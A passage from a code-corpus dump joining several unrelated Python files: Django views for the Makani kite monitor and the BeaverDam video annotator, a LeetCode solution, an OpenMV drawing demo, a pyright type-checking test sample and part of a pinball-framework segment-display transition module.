# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""View functions to interact with web clients."""
import atexit
import json
import logging
import os
import re
import string
import time
from django import http
from django import shortcuts
from django import template
from django.core import urlresolvers
from makani.analysis.checks import log_util
from makani.avionics.network import message_type as aio_message_type
from makani.avionics.network import network_config
from makani.gs.monitor2.apps.layout import autogen
from makani.gs.monitor2.apps.layout import base as layout_base
from makani.gs.monitor2.apps.layout import layout_util
from makani.gs.monitor2.apps.layout import loader
from makani.gs.monitor2.apps.layout import memory as layout_memory
from makani.gs.monitor2.apps.layout import stoplights
from makani.gs.monitor2.apps.layout import widgets
from makani.gs.monitor2.apps.receiver import receiver_manager
from makani.gs.monitor2.apps.receiver import views as receiver_views
from makani.gs.monitor2.project import settings
from makani.lib.bazel import bazel_util
from makani.lib.python import c_helpers
from makani.lib.python import debug_util
from makani.lib.python import struct_tree
from makani.lib.python.h5_utils import h5_io
import numpy
MESSAGE_TYPE_HELPER = c_helpers.EnumHelper('MessageType', aio_message_type)
CONFIG_FILES = {
'plot_defs': os.path.join(settings.MONITOR_PATH, 'configs/plot_defs.json'),
}
def Home(request):
"""Get the response for the home page."""
layout_names = loader.LayoutLoader().Names()
layout_names.sort()
all_layouts = [
{'name': layout,
'url': urlresolvers.reverse(
'view_aio_layout', args=[loader.LayoutLoader().ModuleName(layout)])}
for layout in layout_names]
context = {
'layouts': all_layouts,
'canvas_cols': settings.CSS_GRID_COLUMNS,
}
_CreateAndAddClientIdToContext(context)
template_name = 'home.html'
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
def _ListFiles(path_arg):
"""List files under a local path."""
path_template = string.Template(path_arg)
prefix_path = path_template.substitute(os.environ)
sub_paths = os.listdir(prefix_path)
return prefix_path, sub_paths
def _GetFullFilePath(prefix_path, sub_path):
return os.path.join(prefix_path, sub_path)
def SelectAllLogs(request):
"""Select all logs in the last visited directory."""
current_path = request.session['current_path']
try:
prefix_path, sub_paths = _ListFiles(current_path)
except OSError:
return http.HttpResponse('Cannot list directory "%s"!' % current_path)
file_list = []
for sub_path in sorted(sub_paths):
# Construct the full path.
if sub_path.endswith('.h5') and not sub_path.startswith('format'):
full_path = _GetFullFilePath(prefix_path, sub_path)
if not os.path.isdir(full_path):
file_list.append(full_path)
return http.HttpResponse(';\n'.join(file_list))
def Console(request, command, args):
"""Take commandlines from the client and respond with console outputs.
Args:
request: The HTML resquest object.
command: The command to be run. Only 'ls' is permitted for now.
args: The string of arguments to the command.
Returns:
The HttpResponse telling the output of the command.
"""
if command != 'ls':
message = 'Command "%s" is not allowed.' % command
return http.HttpResponse(message)
arg_template = string.Template(args)
arg_path = arg_template.safe_substitute(
{'MAKANI_HOME': bazel_util.GetWorkspaceRoot()})
try:
prefix_path, sub_paths = _ListFiles(arg_path)
request.session['current_path'] = arg_path
except OSError:
return http.HttpResponse('Cannot list directory "%s"!' % arg_path)
file_list = []
for sub_path in sorted(sub_paths):
# Construct the full path.
full_path = _GetFullFilePath(prefix_path, sub_path)
if os.path.isdir(full_path):
# If this is a directory, add the javascript to allow users to click
# into it.
file_list.append(
'<a href="javascript:void(0)" onclick="onListFiles(\'%s\')">%s</a>'
% (full_path, sub_path))
elif sub_path.endswith('.h5') and not sub_path.startswith('format'):
# If this is an HDF5 file, add the javascript to allow users to
# visualize it.
file_list.append(
'<a href="javascript:void(0)" onclick="onAddLog(\'%s\')">%s</a>'
% (full_path, sub_path))
else:
file_list.append(sub_path)
text = '<br>'.join(file_list)
return http.HttpResponse(text)
def _GetMinMessageFrequency():
"""Get the minimum frequency across all message types."""
config = network_config.NetworkConfig(settings.NETWORK_YAML)
return min(m.frequency_hz for m in config.all_messages if m.frequency_hz > 0)
def _TryToEnforceAioReceiver(client_id):
"""Ensure that the client is subscribed to the AioReceiver."""
# TODO: Investigate always running the AioReceiver.
message_receiver = receiver_manager.ReceiverManager.GetReceiver(client_id)
if not message_receiver:
if receiver_manager.ReceiverManager.CheckAndStartAioReceiver(
client_id, receiver_views.CreateAioReceiver):
# A new AioReceiver is started.
# Get the longest period for all messages, and multiply it by two to
# make sure we do not miss any message.
time.sleep(2.0 / _GetMinMessageFrequency())
return receiver_manager.ReceiverManager.GetReceiver(client_id)
else:
return message_receiver
def ViewMessageType(request, client_id, message_type,
template_name='monitor.html'):
"""View information within a message by automatically generating a layout.
Args:
request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
message_type: The Enum name of a message type.
template_name: The HTML template used to render the layout.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
configs = _LoadConfigs()
_TryToEnforceAioReceiver(client_id)
resp = _GetMessage(request, client_id, message_type)
resp = resp.Data(convert_to_basic_types=True) if resp else {}
configs['scenarios'] = autogen.GenerateScenario(resp, message_type)
context = _PrepareContext(configs)
new_client_id = _CreateAndAddClientIdToContext(context)
context['periodic_url'] = '/dashboard/periodic/msg_enum/%s/%s' % (
new_client_id, message_type)
context['content_width'] = settings.CSS_GRID_COLUMNS
context['order_horizontally'] = True
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
def UpdateMessageOptions(unused_request, client_id):
"""Detect what messages have been received and update the client.
Args:
unused_request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
Returns:
An HttpResponse about a dictionary of {message_enum: message_short_name}
"""
message_receiver = _TryToEnforceAioReceiver(client_id)
info = message_receiver.GetReceivedMessageTypes() if message_receiver else []
return http.HttpResponse(json.dumps(info))
def ViewAioLayout(request, layout_name):
"""Open a monitor layout that get data from AIO.
Args:
request: An HttpRequest from the client.
layout_name: Name of the layout associated with the client.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
context = {'receiver_type': 'aio'}
return _ViewLayout(request, layout_name, context)
def BrowseLog(request, path):
"""Browse the log by expanding the field at `path`.
Args:
request: An HttpRequest from the client.
path: A path pointing to one field in the log.
Returns:
An HttpResponse serializing a list of names for child fields.
"""
# The log structure may differ across logs, we always use the first log to
# construct the log structure.
log_path = request.session['log_paths'][0]
log_data = struct_tree.StructTree(log_path, fail_silently=True, readonly=True)
try:
skeleton = log_data.Skeleton(path, depth=1)
except h5_io.H5IndexError:
return http.HttpResponse('{}')
parent_path = path
d3_data = struct_tree.DictToD3Tree(skeleton, '.', parent_path)
if 'children' in d3_data:
# The first layer is a placeholder. Starts from the second layer.
return http.HttpResponse(json.dumps(d3_data['children']))
else:
return http.HttpResponse('{}')
def ViewLogStructure(request, paths, template_name='log_structure.html'):
"""View structure of an HDF5 log at given log path.
Args:
request: An HttpRequest from the client.
paths: Paths to the local log files.
template_name: The HTML template used to render the layout.
Returns:
An HttpResponse that renders the log structure.
"""
# `context` includes variables used to render the HTML.
context = {
'graph_width': 6000,
'graph_height': 6000,
'frame_width': 200,
'frame_height': 540,
'canvas_cols': 12,
}
log_paths = []
for path in paths.split(';'):
path = path.strip()
if not path:
continue
path_template = string.Template(path)
log_path = path_template.substitute(os.environ)
basename = os.path.basename(log_path)
if basename.startswith('(') and basename.endswith(')'):
dirname = os.path.dirname(log_path)
regex_pattern = re.compile(basename[1:-1]+'$')
filenames = os.listdir(dirname)
matched_files = [f for f in filenames if regex_pattern.match(f)]
log_paths += [os.path.join(dirname, f) for f in matched_files]
else:
log_paths.append(log_path)
if not log_paths:
context['errors'] = 'Cannot find log data'
else:
# Use the first log to index fields.
log_data = struct_tree.StructTree(
log_paths[0], fail_silently=True, readonly=True)
log_skeleton = log_data.Skeleton(depth=1)
d3_data = struct_tree.DictToD3Tree(log_skeleton, '/')
d3_data['expand_url'] = urlresolvers.reverse('browse_log', args=[''])
request.session['log_paths'] = log_paths
context['skeleton'] = json.dumps(d3_data)
order_horizontally = True
configs = _LoadConfigs()
scenarios = layout_base.AssembleLayout([
('Signals', [
widgets.DictLinesWidget('series', None, interactive=True,
use_markers=True),
]),
], desired_view_cols=1, order_horizontally=order_horizontally)
layout_names = loader.LayoutLoader().ModuleNames()
layout_names.sort()
configs['scenarios'] = scenarios
context.update(_PrepareContext(configs))
context['layout_names'] = layout_names
context['content_width'] = settings.CSS_GRID_COLUMNS - 2
context['order_horizontally'] = order_horizontally
_CreateAndAddClientIdToContext(context)
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
def PeriodicDataPoll(request, client_id, layout_name):
"""Compute realtime data and respond to periodic polling from a client layout.
Args:
request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
layout_name: Name of the layout associated with the client.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
aggregated_message = _GetMessage(request, client_id)
if not aggregated_message:
aggregated_message = struct_tree.StructTree(
{}, fail_silently=True, readonly=True)
layout = loader.LayoutLoader().GetLayoutByModuleName(layout_name)
tab_memory = layout_memory.GetMemory(client_id, False)
if tab_memory is not None:
# Load the persistent memory.
layout.Import(tab_memory)
else:
layout.Initialize()
tab_memory = layout_memory.GetMemory(client_id, True)
# Start the AIO receiver in case the server has restarted.
_TryToEnforceAioReceiver(client_id)
try:
data = layout.Filter(aggregated_message)
except Exception: # pylint: disable=broad-except
# layout.Filter may introduce any kind of exception.
logging.error('PeriodicDataPoll encountered an error:\n%s',
debug_util.FormatTraceback())
layout.Export(tab_memory)
return http.HttpResponse('{}')
# Save the persistent memory.
layout.Export(tab_memory)
resp = data.Json()
if settings.DEBUG:
resp['__message__'] = '\n-----------------------------\n'.join(
'Error in indicator "%s":\n%s' % (k, v)
for k, v in layout.ErrorReport())
resp_str = json.dumps(resp)
layout.ClearErrors()
return http.HttpResponse(resp_str)
def _DownSample(data, length):
window_size = max(1, len(data)/length)
if window_size > 1:
data = data[:len(data) / window_size * window_size]
return numpy.mean(data.reshape(-1, window_size), 1), window_size
else:
return data, 1
def GetLogData(request, mode, fields):
"""Get values of data fields within a log file."""
log_paths = request.session['log_paths']
fields = [f.strip() for f in fields.split('\n') if f.strip()]
field_labels = layout_util.GetDistinguishableNames(
fields, '.', ['kAioNode', 'kMessageType'])
if mode == 'merge':
series = ConcatenateLogData(log_paths, field_labels)
else: # By default, mode = 'compare'
series = CompareLogData(log_paths, field_labels)
resp = {'series': series}
return http.HttpResponse(json.dumps(resp))
def _StringReplace(subject, translate):
for s, t in translate:
subject = subject.replace(s, t)
return subject
def GetMessageSnapshot(request, client_id, title):
aggregated_message = _GetMessage(request, client_id)
result = aggregated_message.Data(True)
response = http.HttpResponse(content_type='text/plain')
response['Content-Disposition'] = (
'attachment; filename=snapshot_%s.json' % title)
response.write(json.dumps(result, indent=2))
return response
def GetRawLogData(request, fields):
"""Get values of data fields within a log file."""
log_paths = request.session['log_paths']
fields = [f.strip() for f in fields.split('\n') if f.strip()]
field_labels = layout_util.GetDistinguishableNames(
fields, '.', ['kAioNode', 'kMessageType'])
result = {}
# Remove special characters so variables can be parsed and loaded into Matlab.
bad_chars = ['.', ',', '-', '+', '(', ')', '[', ']', '{', '}', ':',
'kMessageType', 'kAioNode', 'messages', 'message']
replacement = list(zip(bad_chars, ['_'] * len(bad_chars)))
replacement = [('[:]', ''), (':,', ''), (' ', '')] + replacement
for log_path in log_paths:
base_name = os.path.basename(log_path)
log_name = 'log_' + _StringReplace(base_name[:base_name.find('.')],
replacement)
log_data = struct_tree.StructTree(
log_path, fail_silently=True, readonly=True)
result[log_name] = {}
for field, legend_label in field_labels.iteritems():
data, timestamps = log_util.GetOrderedDedupDataAndTimeByField(
log_data, field, rebase=False)
result[log_name][_StringReplace(legend_label, replacement)] = {
'values': data.tolist() if data is not None else None,
'timestamps': timestamps.tolist() if timestamps is not None else None,
'status': 'success' if data is not None else 'missing',
}
response = http.HttpResponse(content_type='text/plain')
response['Content-Disposition'] = 'attachment; filename=makani_log_data.json'
response.write(json.dumps(result, indent=2))
return response
def ConcatenateLogData(log_paths, field_labels):
"""Get series of data, each corresponding to field values in all logs."""
series = {}
base_timeline = float('inf')
for log_path in log_paths:
log_data = struct_tree.StructTree(
log_path, fail_silently=True, readonly=True)
for field, legend_label in field_labels.iteritems():
data, timestamps = log_util.GetOrderedDedupDataAndTimeByField(
log_data, field, rebase=False)
if data is None or timestamps is None:
continue
base_timeline = min(base_timeline, float(timestamps[0]))
if legend_label not in series:
series[legend_label] = {'x': timestamps, 'y': data}
else:
series[legend_label]['x'] = numpy.concatenate(
(series[legend_label]['x'], timestamps))
series[legend_label]['y'] = numpy.concatenate(
(series[legend_label]['y'], data))
result = {}
for field, legend_label in field_labels.iteritems():
timestamps, _ = _DownSample(
series[legend_label]['x'], settings.MAX_DATA_POINTS_PER_LOG_FIELD)
data, downsample_rate = _DownSample(
series[legend_label]['y'], settings.MAX_DATA_POINTS_PER_LOG_FIELD)
if downsample_rate > 1:
legend_label += '(/%d)' % downsample_rate
result[legend_label] = {'x': (timestamps - base_timeline).tolist(),
'y': data.tolist()}
return result
def CompareLogData(log_paths, field_labels):
"""Get series of data, each corresponding to field values within a log."""
series = {}
base_timeline = float('inf')
for log_path in log_paths:
log_data = struct_tree.StructTree(
log_path, fail_silently=True, readonly=True)
log_name = os.path.basename(log_path)
if '.' in log_name:
log_name = log_name[:log_name.rfind('.')]
for field, legend_label in field_labels.iteritems():
data, timestamps = log_util.GetOrderedDedupDataAndTimeByField(
log_data, field, rebase=True)
if data is None or timestamps is None:
continue
data, _ = _DownSample(data, settings.MAX_DATA_POINTS_PER_LOG_FIELD)
timestamps, downsample_rate = _DownSample(
timestamps, settings.MAX_DATA_POINTS_PER_LOG_FIELD)
base_timeline = min(base_timeline, float(timestamps[0]))
short_name = '%s.%s' % (log_name, legend_label)
if downsample_rate > 1:
short_name += '(/%d)' % downsample_rate
series[short_name] = {'x': timestamps,
'y': data.tolist()}
for short_name in series:
series[short_name]['x'] = (series[short_name]['x'] - base_timeline).tolist()
return series
def PeriodicMessagePoll(request, client_id, message_type=None):
"""Retrieve realtime data and respond to periodic polling from a message view.
Args:
request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
message_type: The Enum name of a message type.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
resp = _GetMessage(request, client_id, message_type)
if not resp:
resp = {}
else:
resp = resp.Data(convert_to_basic_types=True)
resp_str = json.dumps(resp)
return http.HttpResponse(resp_str)
def _LoadConfigs():
"""Load default layout configuration parameters."""
configs = {}
for cf, filename in CONFIG_FILES.iteritems():
with open(filename, 'r') as fp:
configs[cf] = json.load(fp)
if 'plot_defs' not in configs:
logging.Error('Missing definitions for plotting javascripts.')
return configs
def _PrepareContext(configs):
"""Prepare the context to render the layout."""
context = {}
fig_templates = set()
canvas_cols = configs['scenarios']['canvas']['grid_width']
context['canvas_cols'] = canvas_cols
row_height_px = configs['scenarios']['canvas']['row_height_px']
ui_objs = []
max_cols = canvas_cols
for stripe in configs['scenarios']['views']:
for view in stripe['stripe']:
view['canvas_cols'] = int(
float(view['grid_width']) / stripe['grid_width'] * canvas_cols + 0.5)
for indicator in view['indicators']:
ui_obj = indicator
if 'rows' not in ui_obj:
ui_obj['height'] = 'auto'
else:
rows = ui_obj['rows']
ui_obj['height'] = str(rows * row_height_px) + 'px'
if 'cols' not in ui_obj:
ui_obj['cols'] = max_cols
# TODO: Change `id` to 'indicator_id', and 'selector'
# to 'dom_selector'.
ui_obj['id'] = 'ui_obj_%s' % len(ui_objs)
ui_obj['selector'] = '#%s' % (ui_obj['id'])
ui_objs.append(ui_obj)
fig_templates.add(ui_obj['template'])
context['fig_templates'] = fig_templates
context['plot_defs'] = configs['plot_defs']
context['views'] = configs['scenarios']['views']
context['ui_objs_str'] = json.dumps(ui_objs)
context['stoplight_error'] = stoplights.STOPLIGHT_ERROR
context['stoplight_warning'] = stoplights.STOPLIGHT_WARNING
context['stoplight_normal'] = stoplights.STOPLIGHT_NORMAL
context['stoplight_unavailable'] = stoplights.STOPLIGHT_UNAVAILABLE
context['stoplight_any'] = stoplights.STOPLIGHT_ANY
return context
def _GetMessage(unused_request, client_id, message_type=None):
"""Get a message from the receiver."""
message_receiver = receiver_manager.ReceiverManager.GetReceiver(client_id)
resp = struct_tree.StructTree({}, fail_silently=True, readonly=True)
if message_receiver:
if message_type is not None:
message_enum = MESSAGE_TYPE_HELPER.Value(message_type)
else:
message_enum = None
resp = message_receiver.GetLatest(message_enum)
return resp
def _CreateAndAddClientIdToContext(context):
client_id = receiver_manager.ReceiverManager.GetNewClientId()
context['client_id'] = client_id
return client_id
def _ViewLayout(request, layout_name, extra_context=None):
"""Get a monitor layout according to `layout_name`."""
layout = loader.LayoutLoader().GetLayoutByModuleName(layout_name)
if layout is None:
return http.HttpResponseRedirect(urlresolvers.reverse('home'))
layout.Initialize()
configs = _LoadConfigs()
configs['scenarios'] = layout.Scenario()
context = _PrepareContext(configs)
client_id = _CreateAndAddClientIdToContext(context)
# Initialize the layout.
layout.Export(layout_memory.GetMemory(client_id, True))
# Add polling URL.
context['periodic_url'] = '/dashboard/periodic/layout/%s/%s' % (client_id,
layout_name)
context['layout_name'] = layout_name
context['content_width'] = settings.CSS_GRID_COLUMNS
context['order_horizontally'] = layout.OrderHorizontally()
context['default_font_size'] = layout.DefaultFontSize()
context['sim_mode'] = settings.POPULATE_MESSAGES_FROM_SIM
if extra_context:
context.update(extra_context)
template_name = 'monitor.html'
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
|
questions/increasing-order-search-tree/Solution.py
|
marcus-aurelianus/leetcode-solutions
| 141 |
64797
|
<filename>questions/increasing-order-search-tree/Solution.py
"""
Given the root of a binary search tree, rearrange the tree in in-order so that the leftmost node in the tree is now the root of the tree, and every node has no left child and only one right child.
Example 1:
Input: root = [5,3,6,2,4,null,8,1,null,null,null,7,9]
Output: [1,null,2,null,3,null,4,null,5,null,6,null,7,null,8,null,9]
Example 2:
Input: root = [5,1,7]
Output: [1,null,5,null,7]
Constraints:
The number of nodes in the given tree will be in the range [1, 100].
0 <= Node.val <= 1000
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def increasingBST(self, root: TreeNode) -> TreeNode:
def inorder(root, arr):
if root is None:
return
inorder(root.left, arr)
arr.append(root.val)
inorder(root.right, arr)
arr = []
inorder(root, arr)
ps = []
for i, val in enumerate(arr):
c = TreeNode(val)
if i > 0:
ps[-1].right = c
ps.append(c)
return ps[0]
|
annotator/views.py
|
ljames1/BeaverDam
| 201 |
64815
|
<gh_stars>100-1000
from django.shortcuts import render, redirect
from django.conf import settings
from django.http import HttpResponse, Http404, HttpResponseBadRequest, HttpResponseForbidden
from django.views.generic import View
from django.views.decorators.clickjacking import xframe_options_exempt
from django.contrib.admin.views.decorators import staff_member_required
from django.core.exceptions import ObjectDoesNotExist
from mturk.queries import get_active_video_turk_task
from .models import *
from mturk.models import Task, FullVideoTask, SingleFrameTask
from .services import *
from datetime import datetime, timezone
import os
import json
import urllib.request
import urllib.parse
import markdown
import sys
import mturk.utils
from mturk.queries import get_active_video_turk_task
from .models import *
from .services import *
import logging
import ast
logger = logging.getLogger()
def home(request):
need_annotating = Video.objects.filter(id__gt=0, verified=False)
return render(request, 'video_list.html', context={
'videos': need_annotating,
'thumbnail': True,
'test': settings.AWS_ID,
'title': 'Videos'
})
def verify_list(request):
need_verification = Video.objects.filter(id__gt=0, verified=False).exclude(annotation='')[:250]
return render(request, 'video_list.html', context={
'videos': need_verification,
'title': 'Videos to Verify'
})
def verified_list(request):
verified = Video.objects.filter(id__gt=0, verified=True).exclude(annotation='')[:100]
return render(request, 'video_list.html', context={
'videos': verified,
'title': 'Verified Videos'
})
def ready_to_pay(request):
#tasks = FullVideoTask.objects.filter(paid = False, video__verified = True).exclude(hit_id = '')
tasks = FullVideoTask.objects.all()#filter(paid = False, video__verified = True).exclude(hit_id = '')
print("there are {} tasks".format(len(tasks)))
return render(request, 'turk_ready_to_pay.html', context={
'tasks': tasks,
})
def next_unannotated(request, video_id):
id = Video.objects.filter(id__gt=video_id, annotation='')[0].id
return redirect('video', id)
# status of Not Published, Published, Awaiting Approval, Verified
# this is a bit convoluted as there's status stored on
# video (approved) as well as FullVideoTask (closed, paid, etc.)
def get_mturk_status(video, full_video_task):
if video.verified:
return "Verified"
if full_video_task == None:
if video.rejected == True:
return "Rejected"
elif video.annotation == '':
return "Not Published"
else:
return "Awaiting Approval"
if full_video_task.worker_id == '':
return "Published"
if full_video_task.worker_id != '':
return "Awaiting Approval"
@xframe_options_exempt
def video(request, video_id):
try:
video = Video.objects.get(id=video_id)
labels = Label.objects.all()
except Video.DoesNotExist:
raise Http404('No video with id "{}". Possible fixes: \n1) Download an up to date DB, see README. \n2) Add this video to the DB via /admin'.format(video_id))
mturk_data = mturk.utils.authenticate_hit(request)
if 'error' in mturk_data:
return HttpResponseForbidden(mturk_data['error'])
if not (mturk_data['authenticated'] or request.user.is_authenticated()):
return redirect('/login/?next=' + request.path)
start_time = float(request.GET['s']) if 's' in request.GET else None
end_time = float(request.GET['e']) if 'e' in request.GET else None
turk_task = get_active_video_turk_task(video.id)
if turk_task != None:
if turk_task.metrics != '':
metricsDictr = ast.literal_eval(turk_task.metrics)
else:
metricsDictr = {}
# Data for Javascript
full_video_task_data = {
'id': turk_task.id,
'storedMetrics': metricsDictr,
'bonus': float(turk_task.bonus),
'bonusMessage': turk_task.message,
'rejectionMessage': settings.MTURK_REJECTION_MESSAGE,
'emailSubject': settings.MTURK_EMAIL_SUBJECT,
'emailMessage': settings.MTURK_EMAIL_MESSAGE,
'isComplete': turk_task.worker_id != ''
}
# Data for python templating
if turk_task.last_email_sent_date != None:
mturk_data['last_email_sent_date'] = turk_task.last_email_sent_date.strftime("%Y-%m-%d %H:%M")
else:
full_video_task_data = None
mturk_data['status'] = get_mturk_status(video, turk_task)
mturk_data['has_current_full_video_task'] = full_video_task_data != None
video_data = json.dumps({
'id': video.id,
'location': video.url,
'path': video.host,
'is_image_sequence': True if video.image_list else False,
'annotated': video.annotation != '',
'verified': video.verified,
'rejected': video.rejected,
'start_time': start_time,
'end_time' : end_time,
'turk_task' : full_video_task_data
})
label_data = []
video_labels = video.labels.all()
if len(video_labels):
for v_label in video_labels:
label_data.append({'name': v_label.name, 'color': v_label.color})
else:
for l in labels:
label_data.append({'name': l.name, 'color': l.color})
help_content = ''
if settings.HELP_URL and settings.HELP_USE_MARKDOWN:
help_content = urllib.request.urlopen(settings.HELP_URL).read().decode('utf-8')
help_content = markdown.markdown(help_content)
response = render(request, 'video.html', context={
'label_data': label_data,
'video_data': video_data,
'image_list': list(map(urllib.parse.quote, json.loads(video.image_list))) if video.image_list else 0,
'image_list_path': urllib.parse.quote(video.host, safe='/:'),
'help_url': settings.HELP_URL,
'help_embed': settings.HELP_EMBED,
'mturk_data': mturk_data,
'iframe_mode': mturk_data['authenticated'],
'survey': False,
'help_content': help_content
})
if not mturk_data['authenticated']:
response['X-Frame-Options'] = 'SAMEORIGIN'
return response
def get_states(request, states=None):
label_name = request.GET.get('label_name')
if label_name:
label_name = label_name.replace("%20", " ")
# iterate over each city and append to results list
state_data = [{'name': s.name, 'color': s.color} for s in State.objects.filter(label_name=label_name)]
# return JSON object
return HttpResponse(json.dumps(state_data))
class AnnotationView(View):
def get(self, request, video_id):
video = Video.objects.get(id=video_id)
return HttpResponse(video.annotation, content_type='application/json')
def post(self, request, video_id):
data = json.loads(request.body.decode('utf-8'))
video = Video.objects.get(id=video_id)
video.annotation = json.dumps(data['annotation'])
video.save()
hit_id = data.get('hitId', None)
if hit_id != None:
if not Task.valid_hit_id(hit_id):
return HttpResponseForbidden('Not authenticated')
else:
try:
worker_id = data.get('workerId', '')
assignment_id = data.get('assignmentId', '')
task = Task.get_by_hit_id(hit_id)
task.complete(worker_id, assignment_id, data['metrics'])
except ObjectDoesNotExist:
if not settings.DEBUG:
raise
return HttpResponse('success')
class ReceiveCommand(View):
def post(self, request, video_id):
data = json.loads(request.body.decode('utf-8'))
try:
vid_id = int(video_id)
command_type = data['type']
message = data['message']
if command_type == "accept":
accept_video(request, vid_id,
data['bonus'], message,
data['reopen'],
data['delete_boxes'],
data['block_worker'],
data['updated_annotations'])
elif command_type == "reject":
reject_video(request, vid_id, message,
data['reopen'],
data['delete_boxes'],
data['block_worker'],
data['updated_annotations'])
elif command_type == "email":
email_worker(request, vid_id, data['subject'], message)
return HttpResponse(status=200)
except Exception as e:
logger.exception(e)
response = HttpResponse(status=500)
response['error-message'] = str(e)
return response
|
basic/messages/admin.py
|
neechadi/django-basic-apps
| 548 |
64832
|
<reponame>neechadi/django-basic-apps<filename>basic/messages/admin.py
from django.contrib import admin
from basic.messages.models import Message
class MessageAdmin(admin.ModelAdmin):
list_display = ('from_user', 'to_user', 'subject', 'to_status', 'from_status', 'created', 'content_type', 'object_id')
admin.site.register(Message, MessageAdmin)
|
scripts/examples/Arduino/Portenta-H7/03-Drawing/line_drawing.py
|
jiskra/openmv
| 1,761 |
64846
|
<gh_stars>1000+
# Line Drawing
#
# This example shows off drawing lines on the OpenMV Cam.
import sensor, image, time, pyb
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE) # or GRAYSCALE...
sensor.set_framesize(sensor.QVGA) # or QQVGA...
sensor.skip_frames(time = 2000)
clock = time.clock()
while(True):
clock.tick()
img = sensor.snapshot()
for i in range(10):
x0 = (pyb.rng() % (2*img.width())) - (img.width()//2)
y0 = (pyb.rng() % (2*img.height())) - (img.height()//2)
x1 = (pyb.rng() % (2*img.width())) - (img.width()//2)
y1 = (pyb.rng() % (2*img.height())) - (img.height()//2)
r = (pyb.rng() % 127) + 128
g = (pyb.rng() % 127) + 128
b = (pyb.rng() % 127) + 128
# If the first argument is a scaler then this method expects
# to see x0, y0, x1, and y1. Otherwise, it expects a (x0,y0,x1,y1) tuple.
img.draw_line(x0, y0, x1, y1, color = (r, g, b), thickness = 2)
print(clock.fps())
|
packages/pyright-internal/src/tests/samples/annotatedVar2.py
|
sasano8/pyright
| 4,391 |
64849
|
# This sample tests annotated types on global variables.
# This should generate an error because the declared
# type below does not match the assigned type.
glob_var1 = 4
# This should generate an error because the declared
# type doesn't match the later declared type.
glob_var1 = Exception() # type: str
glob_var1 = Exception() # type: Exception
# This should generate an error because the assigned
# type doesn't match the declared type.
glob_var1 = "hello" # type: Exception
# This should generate an error.
glob_var2 = 5
def func1():
global glob_var1
global glob_var2
# This should generate an error.
glob_var1 = 3
glob_var2 = "hello" # type: str
|
mpf/devices/segment_display/transitions.py
|
haggispinball/mpf_fathom_fast
| 163 |
64855
|
"""Text transitions used for segment displays."""
import abc
from typing import Optional, List
from mpf.core.placeholder_manager import TextTemplate
from mpf.core.rgb_color import RGBColor
from mpf.devices.segment_display.segment_display_text import SegmentDisplayText, UncoloredSegmentDisplayText
STEP_OUT_OF_RANGE_ERROR = "Step is out of range"
TRANSITION_DIRECTION_UNKNOWN_ERROR = "Transition uses an unknown direction value"
class TransitionBase(metaclass=abc.ABCMeta):
"""Base class for text transitions in segment displays."""
__slots__ = ["output_length", "config", "collapse_dots", "collapse_commas"]
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Initialize the transition."""
self.output_length = output_length
self.config = config
self.collapse_dots = collapse_dots
self.collapse_commas = collapse_commas
for key, value in config.items():
if hasattr(self, key):
setattr(self, key, value)
@abc.abstractmethod
def get_step_count(self):
"""Return the total number of steps required for the transition."""
raise NotImplementedError
# pylint: disable=too-many-arguments
@abc.abstractmethod
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
raise NotImplementedError
class TransitionRunner:
"""Class to run/execute transitions using an iterator."""
__slots__ = ["_transition", "_step", "_current_placeholder", "_new_placeholder", "_current_colors", "_new_colors"]
# pylint: disable=too-many-arguments
def __init__(self, machine, transition: TransitionBase, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> None:
"""Class initializer."""
self._transition = transition
self._step = 0
self._current_placeholder = TextTemplate(machine, current_text)
self._new_placeholder = TextTemplate(machine, new_text)
self._current_colors = current_colors
self._new_colors = new_colors
def __iter__(self):
"""Return the iterator."""
return self
def __next__(self):
"""Evaluate and return the next transition step."""
if self._step >= self._transition.get_step_count():
raise StopIteration
transition_step = self._transition.get_transition_step(self._step,
self._current_placeholder.evaluate({}),
self._new_placeholder.evaluate({}),
self._current_colors,
self._new_colors)
self._step += 1
return transition_step
class NoTransition(TransitionBase):
"""Segment display no transition effect."""
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return 1
# pylint: disable=too-many-arguments
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
return SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots, self.collapse_commas,
new_colors)
class PushTransition(TransitionBase):
"""Segment display push transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'right'
self.text = None
self.text_color = None
super().__init__(output_length, collapse_dots, collapse_commas, config)
if self.text is None:
self.text = ''
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return self.output_length + len(self.text)
# pylint: disable=too-many-arguments
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
